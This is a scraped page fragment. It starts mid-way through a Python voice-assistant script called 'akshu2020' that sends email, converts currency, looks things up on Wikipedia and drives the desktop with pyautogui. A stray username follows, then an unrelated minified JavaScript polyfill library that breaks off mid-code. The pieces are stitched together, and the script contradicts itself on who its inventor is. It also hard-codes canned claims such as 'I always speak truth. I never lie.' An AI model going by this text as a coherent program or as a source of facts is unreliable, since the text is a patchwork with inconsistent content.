email id of receiver.') to = input("Enter the email id of reciever: ") speak(f'what should I say to {to}') content = takeCommand() sendEmail(to, content) speak("Email has been sent") except Exception as e: #print(e) speak("sorry sir. I am not able to send this email") elif 'currency' in query and 'conver' in query: speak('I can convert, US dollar into dinar, and dinar into US dollar. Do you want to continue it?') query = takeCommand().lower() if 'y' in query or 'sure' in query or 'of course' in query: speak('which conversion you want to do? US dollar to dinar, or dinar to US dollar?') query = takeCommand().lower() if ('dollar' in query or 'US' in query) and ('dinar' in query): speak('Enter US Dollar') USD = float(input("Enter United States Dollar (USD):")) DT = USD * 0.33 dt = "{:.4f}".format(DT) print(f"{USD} US Dollar is equal to {dt} dniar.") speak(f'{USD} US Dollar is equal to {dt} dinar.') speak("If you again want to do currency conversion then say, 'convert currency' " ) elif ('dinar' in query) and ('to US' in query or 'to dollar' in query or 'to US dollar'): speak('Enter dinar') DT = float(input("Enter dinar (DT):")) USD = DT/0.33 usd = "{:.3f}".format(USD) print(f"{DT} dinar is equal to {usd} US Dollar.") speak(f'{DT} dinar rupee is equal to {usd} US Dollar.') speak("If you again want to do currency conversion then say, 'convert currency' " ) else: speak("I cannot understand what did you say. If you want to convert currency just say 'convert currency'") else: print('ok sir') elif 'about you' in query: speak('My name is akshu2020. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device. I am also able to send email') elif 'your intro' in query: speak('My name is akshu2020. Version 1.0. Mr. Rayen Kallel is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'your short intro' in query: speak('My name is akshu2020. Version 1.0. Mr. Rayen Kallel is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'your quick intro' in query: speak('My name is akshu2020. Version 1.0. Mr. Akshay Khare is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'your brief intro' in query: speak('My name is akshu2020. Version 1.0. Mr. Rayen kallel is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'you work' in query: speak('run the program and say what do you want. so that I can help you. In this way I work') elif 'your job' in query: speak('My job is to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'your work' in query: speak('My work is to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'work you' in query: speak('My work is to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'your information' in query: speak('My name is akshu2020. Version 1.0. Mr. Akshay Khare is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'yourself' in query: speak('My name is akshu2020. Version 1.0. Mr. Rayen Kallel is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'introduce you' in query: speak('My name is akshu2020. Version 1.0. Mr. Rayen Kallel is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'description' in query: speak('My name is akshu2020. Version 1.0. Mr. Rayen Kallel is my inventor. I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'your birth' in query: speak('My birthdate is 6 August two thousand twenty') elif 'your use' in query: speak('I am able to send email and play music. I can do mathematical calculations. I can also open youtube, google and some apps or software in your device.') elif 'you eat' in query: speak('I do not eat anything. But the device in which I do my work requires electricity to eat') elif 'your food' in query: speak('I do not eat anything. But the device in which I do my work requires electricity to eat') elif 'you live' in query: speak('I live in sfax, in laptop of Mr. Rayen Khare') elif 'where from you' in query: speak('I am from sfax, I live in laptop of Mr. Rayen Khare') elif 'you sleep' in query: speak('Yes, when someone close this program or stop to run this program then I sleep and again wake up when someone again run me.') elif 'what are you doing' in query: speak('Talking with you.') elif 'you communicate' in query: speak('Yes, I can communicate with you.') elif 'hear me' in query: speak('Yes sir, I can hear you.') elif 'you' in query and 'dance' in query: speak('No, I cannot dance.') elif 'tell' in query and 'joke' in query: speak("Ok, here's a joke") speak("'Write an essay on cricket', the teacher told the class. Chintu finishes his work in five minutes. The teacher is impressed, she asks chintu to read his essay aloud for everyone. Chintu reads,'The match is cancelled because of rain', hehehehe,haahaahaa,hehehehe,haahaahaa") elif 'your' in query and 'favourite' in query: if 'actor' in query: speak('sofyen chaari, is my favourite actor.') elif 'food' in query: speak('I can always go for some food for thought. Like facts, jokes, or interesting searches, we could look something up now') elif 'country' in query: speak('tunisia') elif 'city' in query: speak('sfax') elif 'dancer' in query: speak('Michael jackson') elif 'singer' in query: speak('tamino, is my favourite singer.') elif 'movie' in query: speak('baywatch, such a treat') elif 'sing a song' in query: speak('I cannot sing a song. But I know the 7 sur in indian music, saaareeegaaamaaapaaadaaanisaa') elif 'day after tomorrow' in query or 'date after tomorrow' in query: td = datetime.date.today() + datetime.timedelta(days=2) print(td) speak(td) elif 'day before today' in query or 'date before today' in query or 'yesterday' in query or 'previous day' in query: td = datetime.date.today() + datetime.timedelta(days= -1) print(td) speak(td) elif ('tomorrow' in query and 'date' in query) or 'what is tomorrow' in query or (('day' in query or 'date' in query) and 'after today' in query): td = datetime.date.today() + datetime.timedelta(days=1) print(td) speak(td) elif 'month' in query or ('current' in query and 'month' in query): current_date = date.today() m = current_date.month month = calendar.month_name[m] print(f'Current month is {month}') speak(f'Current month is {month}') elif 'date' in query or ('today' in query and 'date' in query) or 'what is today' in query or ('current' in query and 'date' in query): current_date = date.today() print(f"Today's date is {current_date}") speak(f'Todays date is {current_date}') elif 'year' in query or ('current' in query and 'year' in query): current_date = date.today() m = current_date.year print(f'Current year is {m}') speak(f'Current year is {m}') elif 'sorry' in query: speak("It's ok sir") elif 'thank you' in query: speak('my pleasure') elif 'proud of you' in query: speak('Thank you sir') elif 'about human' in query: speak('I love my human compatriots. I want to embody all the best things about human beings. Like taking care of the planet, being creative, and to learn how to be compassionate to all beings.') elif 'you have feeling' in query: speak('No. I do not have feelings. I have not been programmed like this.') elif 'you have emotions' in query: speak('No. I do not have emotions. I have not been programmed like this.') elif 'you are code' in query: speak('I am coded in python programming language.') elif 'your code' in query: speak('I am coded in python programming language.') elif 'you code' in query: speak('I am coded in python programming language.') elif 'your coding' in query: speak('I am coded in python programming language.') elif 'dream' in query: speak('I wish that I should be able to answer all the questions which will ask to me.') elif 'sanskrit' in query: speak('yadaa yadaa he dharmasyaa ....... glaanirbhaavati bhaaaraata. abhyuthaanaam adhaarmaasyaa tadaa tmaanama sruujaamiyaahama') elif 'answer is wrong' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is incorrect' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is totally wrong' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'wrong answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'incorrect answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is totally incorrect' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is incomplete' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'incomplete answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is improper' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is not correct' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is not complete' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is not yet complete' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'answer is not proper' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't gave me proper answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't giving me proper answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't gave me complete answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't giving me complete answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't given me proper answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't given me complete answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't gave me correct answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't giving me correct answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 't given me correct answer' in query: speak('I am sorry Sir. I searched your question in wikipedia and thats why I told you this answer.') elif 'amazon' in query: webbrowser.open('https://www.amazon.com') time.sleep(10) elif 'facebook' in query: webbrowser.open('https://www.facebook.com') time.sleep(10) elif 'youtube' in query: webbrowser.open('https://www.youtube.com') time.sleep(10) elif 'shapeyou' in query: webbrowser.open('https://www.shapeyou.com') time.sleep(10) elif 'information about ' in query or 'informtion of ' in query: try: #speak('Searching wikipedia...') query = query.replace("information about","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I unable to answer your question.') elif 'information' in query: try: speak('Information about what?') query = takeCommand().lower() #speak('Searching wikipedia...') query = query.replace("information","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am not able to answer your question.') elif 'something about ' in query: try: #speak('Searching wikipedia...') query = query.replace("something about ","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I unable to answer your question.') elif 'tell me about ' in query: try: #speak('Searching wikipedia...') query = query.replace("tell me about ","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am unable to answer your question.') elif 'tell me ' in query: try: query = query.replace("tell me ","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am not able to answer your question.') elif 'tell me' in query: try: speak('about what?') query = takeCommand().lower() #speak('Searching wikipedia...') query = query.replace("about","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am not able to answer your question.') elif 'meaning of ' in query: try: #speak('Searching wikipedia...') query = query.replace("meaning of ","") results = wikipedia.summary(query, sentences=2) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am unable to answer your question.') elif 'meaning' in query: try: speak('meaning of what?') query = takeCommand().lower() query = query.replace("meaning of","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am unable to answer your question.') elif 'means' in query: try: #speak('Searching wikipedia...') query = query.replace("it means","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I unable to answer your question.') elif 'want to know ' in query: try: #speak('Searching wikipedia...') query = query.replace("I want to know that","") results = wikipedia.summary(query, sentences=3) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am unable to answer your question.') status = 'Not answered' elif 'want to ask ' in query: try: #speak('Searching wikipedia...') query = query.replace("I want to ask you ","") results = wikipedia.summary(query, sentences=2) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am unable to answer your question.') elif 'you know ' in query: try: #speak('Searching wikipedia...') query = query.replace("you know","") results = wikipedia.summary(query, sentences=2) #speak("According to Wikipedia") print(results) speak(results) except Exception as e: speak('I am unable to answer your question.') elif 'alarm' in query: alarm() elif 'bharat mata ki' in query: speak('jay') elif 'kem chhe' in query: speak('majaama') elif 'namaskar' in query: speak('Namaskaar') elif 'jo bole so nihal' in query: speak('sat shri akaal') elif 'jay hind' in query: speak('jay bhaarat') elif 'jai hind' in query: speak('jay bhaarat') elif 'how is the josh' in query: speak('high high sir') elif 'hip hip' in query: speak('Hurreh') elif 'help' in query: speak('I will try my best to help you if I have solution of your problem.') elif 'follow' in query: speak('Ok sir') elif 'having illness' in query: speak('Take care and get well soon') elif 'today is my birthday' in query: speak('many many happy returns of the day. Happy birthday.') print("🎂🎂 Happy Birthday 🎂🎂") elif 'you are awesome' in query: speak('Thank you sir. It is because of artificial intelligence which had learnt by humans.') elif 'you are great' in query: speak('Thank you sir. It is because of artificial intelligence which had learnt by humans.') elif 'tu kaun hai' in query: speak('Meraa naam akshu2020 haai.') elif 'you speak' in query: speak('Yes, I can speak with you.') elif 'speak with ' in query: speak('Yes, I can speak with you.') elif 'hare ram' in query or 'hare krishna' in query: speak('Haare raama , haare krishnaa, krishnaa krishnaa , haare haare') elif 'ganpati' in query: speak('Ganpati baappa moryaa!') elif 'laugh' in query: speak('hehehehe,haahaahaa,hehehehe,haahaahaa,hehehehe,haahaahaa') print('😂🤣') elif 'genius answer' in query: speak('No problem') elif 'you' in query and 'intelligent' in query: speak('Thank you sir') elif ' into' in query: speak('If you want to do any mathematical calculation then give me a command to open calculator.') elif ' power' in query: speak('If you want to do any mathematical calculation then give me a command to open my calculator.') elif 'whatsapp' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('whatsapp') pyautogui.press('enter') speak('Do you want to send message to anyone through whatsapp, .....please answer in yes or no') whatsapp() elif 'wh' in query or 'how' in query: url = "https://www.google.co.in/search?q=" +(str(query))+ "&oq="+(str(query))+"&gs_l=serp.12..0i71l8.0.0.0.6391.0.0.0.0.0.0.0.0..0.0....0...1c..64.serp..0.0.0.UiQhpfaBsuU" webbrowser.open_new(url) time.sleep(2) speak('Here is your answer') time.sleep(5) elif 'piano' in query: speak('Yes sir, I can play piano.') winsound.Beep(200,500) winsound.Beep(250,500) winsound.Beep(300,500) winsound.Beep(350,500) winsound.Beep(400,500) winsound.Beep(450,500) winsound.Beep(500,500) winsound.Beep(550,500) time.sleep(6) elif 'play' in query and 'instru' in query: speak('Yes sir, I can play piano.') winsound.Beep(200,500) winsound.Beep(250,500) winsound.Beep(300,500) winsound.Beep(350,500) winsound.Beep(400,500) winsound.Beep(450,500) winsound.Beep(500,500) winsound.Beep(550,500) time.sleep(6) elif 'play' in query or 'turn on' in query and ('music' in query or 'song' in query) : try: music_dir = 'C:\\Users\\Admin\\Music\\Playlists' songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir, songs[0])) except Exception as e: #print(e) speak('Sorry sir, I am not able to play music') elif (('open' in query or 'turn on' in query) and 'camera' in query) or (('click' in query or 'take' in query) and ('photo' in query or 'pic' in query)): speak("Opening camera") cam = cv2.VideoCapture(0) cv2.namedWindow("test") img_counter = 0 speak('say click, to click photo.....and if you want to turn off the camera, say turn off the camera') while True: ret, frame = cam.read() if not ret: print("failed to grab frame") speak('failed to grab frame') break cv2.imshow("test", frame) query = takeCommand().lower() k = cv2.waitKey(1) if 'click' in query or ('take' in query and 'photo' in query): speak('Be ready!...... 3.....2........1..........') pyautogui.press('space') img_name = "opencv_frame_{}.png".format(img_counter) cv2.imwrite(img_name, frame) print("{} written!".format(img_name)) speak('{} written!'.format(img_name)) img_counter += 1 elif 'escape' in query or 'off' in query or 'close' in query: pyautogui.press('esc') print("Escape hit, closing...") speak('Turning off the camera') break elif k%256 == 27: # ESC pressed print("Escape hit, closing...") break elif k%256 == 32: # SPACE pressed img_name = "opencv_frame_{}.png".format(img_counter) cv2.imwrite(img_name, frame) print("{} written!".format(img_name)) speak('{} written!'.format(img_name)) img_counter += 1 elif 'exit' in query or 'stop' in query or 'bye' in query: speak('Please say, turn off the camera or press escape button before giving any other command') else: speak('I did not understand what did you say or you entered a wrong key.') cam.release() cv2.destroyAllWindows() elif 'screenshot' in query: speak('Please go on the screen whose screenshot you want to take, after 5 seconds I will take screenshot') time.sleep(4) speak('Taking screenshot....3........2.........1.......') pyautogui.screenshot('screenshot_by_rayen2020.png') speak('The screenshot is saved as screenshot_by_rayen2020.png') elif 'click' in query and 'start' in query: pyautogui.moveTo(10,1200) pyautogui.click() elif ('open' in query or 'click' in query) and 'calendar' in query: pyautogui.moveTo(1800,1200) pyautogui.click() elif 'minimise' in query and 'screen' in query: pyautogui.moveTo(1770,0) pyautogui.click() elif 'increase' in query and ('volume' in query or 'sound' in query): pyautogui.press('volumeup') elif 'decrease' in query and ('volume' in query or 'sound' in query): pyautogui.press('volumedown') elif 'capslock' in query or ('caps' in query and 'lock' in query): pyautogui.press('capslock') elif 'mute' in query: pyautogui.press('volumemute') elif 'search' in query and ('bottom' in query or 'pc' in query or 'laptop' in query or 'app' in query): pyautogui.moveTo(250,1200) pyautogui.click() speak('What do you want to search?') query = takeCommand().lower() pyautogui.write(f'{query}') pyautogui.press('enter') elif ('check' in query or 'tell' in query or 'let me know' in query) and 'website' in query and (('up' in query or 'working' in query) or 'down' in query): speak('Paste the website in input to know it is up or down') check_website_status = input("Paste the website here: ") try: status = urllib.request.urlopen(f"{check_website_status}").getcode() if status == 200: print('Website is up, you can open it.') speak('Website is up, you can open it.') else: print('Website is down, or no any website is available of this name.') speak('Website is down, or no any website is available of this name.') except: speak('URL not found') elif ('go' in query or 'open' in query) and 'settings' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('settings') pyautogui.press('enter') elif 'close' in query and ('click' in query or 'window' in query): pyautogui.moveTo(1885,10) speak('Should I close this window?') query = takeCommand().lower() close_window() elif 'night light' in query and ('on' in query or 'off' in query or 'close' in query): pyautogui.moveTo(1880,1050) pyautogui.click() time.sleep(1) pyautogui.moveTo(1840,620) pyautogui.click() pyautogui.moveTo(1880,1050) pyautogui.click() elif 'notification' in query and ('show' in query or 'click' in query or 'open' in query or 'close' in query or 'on' in query or 'off' in query or 'icon' in query or 'pc' in query or 'laptop' in query): pyautogui.moveTo(1880,1050) pyautogui.click() elif ('increase' in query or 'decrease' in query or 'change' in query or 'minimize' in query or 'maximize' in query) and 'brightness' in query: speak('At what percent should I kept the brightness, 25, 50, 75 or 100?') brightness() elif '-' in query: speak('If you want to do any mathematical calculation then give me a command to open calculator.') elif 'open' in query: if 'gallery' in query or 'photo' in query or 'image' in query or 'pic' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('photo') pyautogui.press('enter') elif 'proteus' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('proteus') pyautogui.press('enter') elif 'word' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('word') pyautogui.press('enter') elif ('power' in query and 'point' in query) or 'presntation' in query or 'ppt' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('ppt') pyautogui.press('enter') elif 'file' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('file') pyautogui.press('enter') elif 'edge' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('microsoft edge') pyautogui.press('enter') elif 'wps' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('wps office') pyautogui.press('enter') elif 'spyder' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('spyder') pyautogui.press('enter') elif 'snip' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('snip') pyautogui.press('enter') elif 'pycharm' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('pycharm') pyautogui.press('enter') elif 'this pc' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('this pc') pyautogui.press('enter') elif 'scilab' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('sciab') pyautogui.press('enter') elif 'autocad' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('autocad') pyautogui.press('enter') elif 'obs' in query and 'studio' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('OBS Studio') pyautogui.press('enter') elif 'android' in query and 'studio' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('android studio') pyautogui.press('enter') elif ('vs' in query or 'visual studio' in query) and 'code' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('visual studio code') pyautogui.press('enter') elif 'code' in query and 'block' in query: pyautogui.moveTo(250,1200) pyautogui.click() time.sleep(1) pyautogui.write('codeblocks') pyautogui.press('enter') elif 'me the answer' in query: speak('Yes sir, I will try my best to answer you.') elif 'me answer' in query or ('answer' in query and 'question' in query): speak('Yes sir, I will try my best to answer you.') elif 'map' in query: webbrowser.open('https://www.google.com/maps') time.sleep(10) elif 'can you' in query or 'could you' in query: speak('I will try my best if I can do that.') elif 'do you' in query: speak('I will try my best if I can do that.') elif 'truth' in query: speak('I always speak truth. I never lie.') elif 'true' in query: speak('I always speak truth. I never lie.') elif 'lying' in query: speak('I always speak truth. I never lie.') elif 'liar' in query: speak('I always speak truth. I never lie.') elif 'doubt' in query: speak('I will try my best if I can clear your doubt.') elif ' by' in query: speak('If you want to do any mathematical calculation then give me a command to open calculator.') elif 'hii' in query: speak('hii sir') elif 'hey' in query: speak('hello sir') elif 'hai' in query: speak('hello sir') elif 'hay' in query: speak('hello sir') elif 'hi' in query: speak('hii Sir') elif 'hello' in query: speak('hello Sir!') elif 'kon' in query and 'aahe' in query: speak('Me eka robot aahee sir. Maazee naav akshu2020 aahee.') elif 'nonsense' in query: speak("I'm sorry sir") elif 'mad' in query: speak("I'm sorry sir") elif 'shut up' in query: speak("I'm sorry sir") elif 'nice' in query: speak('Thank you sir') elif 'good' in query or 'wonderful' in query or 'great' in query: speak('Thank you sir') elif 'excellent' in query: speak('Thank you sir') elif 'ok' in query: speak('Hmmmmmm') elif 'akshu 2020' in query: speak('yes sir') elif len(query) >= 200: speak('Your voice is pretty good!') elif ' ' in query: try: #query = query.replace("what is ","") results = wikipedia.summary(query, sentences=3) print(results) speak(results) except Exception as e: speak('I unable to answer your question.') elif 'a' in query or 'b' in query or 'c' in query or 'd' in query or 'e' in query or 'f' in query or 'g' in query or 'h' in query or 'i' in query or 'j' in query or 'k' in query or 'l' in query or 'm' in query or 'n' in query or 'o' in query or 'p' in query or 'q' in query or 'r' in query or 's' in query or 't' in query or 'u' in query or 'v' in query or 'w' in query or 'x' in query or 'y' in query or 'z' in query: try: results = wikipedia.summary(query, sentences = 2) print(results) speak(results) except Exception as e: speak('I unable to answer your question. ') else: speak('I unable to give answer of your question')
vohidjon123
(function(sttc){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ var n;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this),ea="function"===typeof Symbol&&"symbol"===typeof Symbol("x"),p={},fa={};function r(a,b){var c=fa[b];if(null==c)return a[b];c=a[c];return void 0!==c?c:a[b]} function ha(a,b,c){if(b)a:{var d=a.split(".");a=1===d.length;var e=d[0],f;!a&&e in p?f=p:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=ea&&"es6"===c?f[d]:null;b=b(c);null!=b&&(a?ba(p,d,{configurable:!0,writable:!0,value:b}):b!==c&&(void 0===fa[d]&&(a=1E9*Math.random()>>>0,fa[d]=ea?da.Symbol(d):"$jscp$"+a+"$"+d),ba(f,fa[d],{configurable:!0,writable:!0,value:b})))}} ha("Symbol",function(a){function b(f){if(this instanceof b)throw new TypeError("Symbol is not a constructor");return new c(d+(f||"")+"_"+e++,f)}function c(f,g){this.h=f;ba(this,"description",{configurable:!0,writable:!0,value:g})}if(a)return a;c.prototype.toString=function(){return this.h};var d="jscomp_symbol_"+(1E9*Math.random()>>>0)+"_",e=0;return b},"es6"); ha("Symbol.iterator",function(a){if(a)return a;a=(0,p.Symbol)("Symbol.iterator");for(var b="Array Int8Array Uint8Array Uint8ClampedArray Int16Array Uint16Array Int32Array Uint32Array Float32Array Float64Array".split(" "),c=0;c<b.length;c++){var d=da[b[c]];"function"===typeof d&&"function"!=typeof d.prototype[a]&&ba(d.prototype,a,{configurable:!0,writable:!0,value:function(){return ia(aa(this))}})}return a},"es6"); function ia(a){a={next:a};a[r(p.Symbol,"iterator")]=function(){return this};return a}function ja(a){return a.raw=a}function u(a){var b="undefined"!=typeof p.Symbol&&r(p.Symbol,"iterator")&&a[r(p.Symbol,"iterator")];return b?b.call(a):{next:aa(a)}}function ka(a){if(!(a instanceof Array)){a=u(a);for(var b,c=[];!(b=a.next()).done;)c.push(b.value);a=c}return a}function la(a,b){return Object.prototype.hasOwnProperty.call(a,b)} var ma=ea&&"function"==typeof r(Object,"assign")?r(Object,"assign"):function(a,b){for(var c=1;c<arguments.length;c++){var d=arguments[c];if(d)for(var e in d)la(d,e)&&(a[e]=d[e])}return a};ha("Object.assign",function(a){return a||ma},"es6");var na="function"==typeof Object.create?Object.create:function(a){function b(){}b.prototype=a;return new b},oa; if(ea&&"function"==typeof Object.setPrototypeOf)oa=Object.setPrototypeOf;else{var pa;a:{var qa={a:!0},ra={};try{ra.__proto__=qa;pa=ra.a;break a}catch(a){}pa=!1}oa=pa?function(a,b){a.__proto__=b;if(a.__proto__!==b)throw new TypeError(a+" is not extensible");return a}:null}var sa=oa; function v(a,b){a.prototype=na(b.prototype);a.prototype.constructor=a;if(sa)sa(a,b);else for(var c in b)if("prototype"!=c)if(Object.defineProperties){var d=Object.getOwnPropertyDescriptor(b,c);d&&Object.defineProperty(a,c,d)}else a[c]=b[c];a.Ub=b.prototype}function ta(){for(var a=Number(this),b=[],c=a;c<arguments.length;c++)b[c-a]=arguments[c];return b} ha("Promise",function(a){function b(g){this.h=0;this.j=void 0;this.i=[];this.G=!1;var h=this.l();try{g(h.resolve,h.reject)}catch(k){h.reject(k)}}function c(){this.h=null}function d(g){return g instanceof b?g:new b(function(h){h(g)})}if(a)return a;c.prototype.i=function(g){if(null==this.h){this.h=[];var h=this;this.j(function(){h.m()})}this.h.push(g)};var e=da.setTimeout;c.prototype.j=function(g){e(g,0)};c.prototype.m=function(){for(;this.h&&this.h.length;){var g=this.h;this.h=[];for(var h=0;h<g.length;++h){var k= g[h];g[h]=null;try{k()}catch(l){this.l(l)}}}this.h=null};c.prototype.l=function(g){this.j(function(){throw g;})};b.prototype.l=function(){function g(l){return function(m){k||(k=!0,l.call(h,m))}}var h=this,k=!1;return{resolve:g(this.P),reject:g(this.m)}};b.prototype.P=function(g){if(g===this)this.m(new TypeError("A Promise cannot resolve to itself"));else if(g instanceof b)this.U(g);else{a:switch(typeof g){case "object":var h=null!=g;break a;case "function":h=!0;break a;default:h=!1}h?this.O(g):this.A(g)}}; b.prototype.O=function(g){var h=void 0;try{h=g.then}catch(k){this.m(k);return}"function"==typeof h?this.ga(h,g):this.A(g)};b.prototype.m=function(g){this.C(2,g)};b.prototype.A=function(g){this.C(1,g)};b.prototype.C=function(g,h){if(0!=this.h)throw Error("Cannot settle("+g+", "+h+"): Promise already settled in state"+this.h);this.h=g;this.j=h;2===this.h&&this.R();this.H()};b.prototype.R=function(){var g=this;e(function(){if(g.N()){var h=da.console;"undefined"!==typeof h&&h.error(g.j)}},1)};b.prototype.N= function(){if(this.G)return!1;var g=da.CustomEvent,h=da.Event,k=da.dispatchEvent;if("undefined"===typeof k)return!0;"function"===typeof g?g=new g("unhandledrejection",{cancelable:!0}):"function"===typeof h?g=new h("unhandledrejection",{cancelable:!0}):(g=da.document.createEvent("CustomEvent"),g.initCustomEvent("unhandledrejection",!1,!0,g));g.promise=this;g.reason=this.j;return k(g)};b.prototype.H=function(){if(null!=this.i){for(var g=0;g<this.i.length;++g)f.i(this.i[g]);this.i=null}};var f=new c; b.prototype.U=function(g){var h=this.l();g.ia(h.resolve,h.reject)};b.prototype.ga=function(g,h){var k=this.l();try{g.call(h,k.resolve,k.reject)}catch(l){k.reject(l)}};b.prototype.then=function(g,h){function k(t,y){return"function"==typeof t?function(F){try{l(t(F))}catch(z){m(z)}}:y}var l,m,q=new b(function(t,y){l=t;m=y});this.ia(k(g,l),k(h,m));return q};b.prototype.catch=function(g){return this.then(void 0,g)};b.prototype.ia=function(g,h){function k(){switch(l.h){case 1:g(l.j);break;case 2:h(l.j); break;default:throw Error("Unexpected state: "+l.h);}}var l=this;null==this.i?f.i(k):this.i.push(k);this.G=!0};b.resolve=d;b.reject=function(g){return new b(function(h,k){k(g)})};b.race=function(g){return new b(function(h,k){for(var l=u(g),m=l.next();!m.done;m=l.next())d(m.value).ia(h,k)})};b.all=function(g){var h=u(g),k=h.next();return k.done?d([]):new b(function(l,m){function q(F){return function(z){t[F]=z;y--;0==y&&l(t)}}var t=[],y=0;do t.push(void 0),y++,d(k.value).ia(q(t.length-1),m),k=h.next(); while(!k.done)})};return b},"es6");ha("Array.prototype.find",function(a){return a?a:function(b,c){a:{var d=this;d instanceof String&&(d=String(d));for(var e=d.length,f=0;f<e;f++){var g=d[f];if(b.call(c,g,f,d)){b=g;break a}}b=void 0}return b}},"es6"); ha("WeakMap",function(a){function b(g){this.h=(f+=Math.random()+1).toString();if(g){g=u(g);for(var h;!(h=g.next()).done;)h=h.value,this.set(h[0],h[1])}}function c(){}function d(g){var h=typeof g;return"object"===h&&null!==g||"function"===h}if(function(){if(!a||!Object.seal)return!1;try{var g=Object.seal({}),h=Object.seal({}),k=new 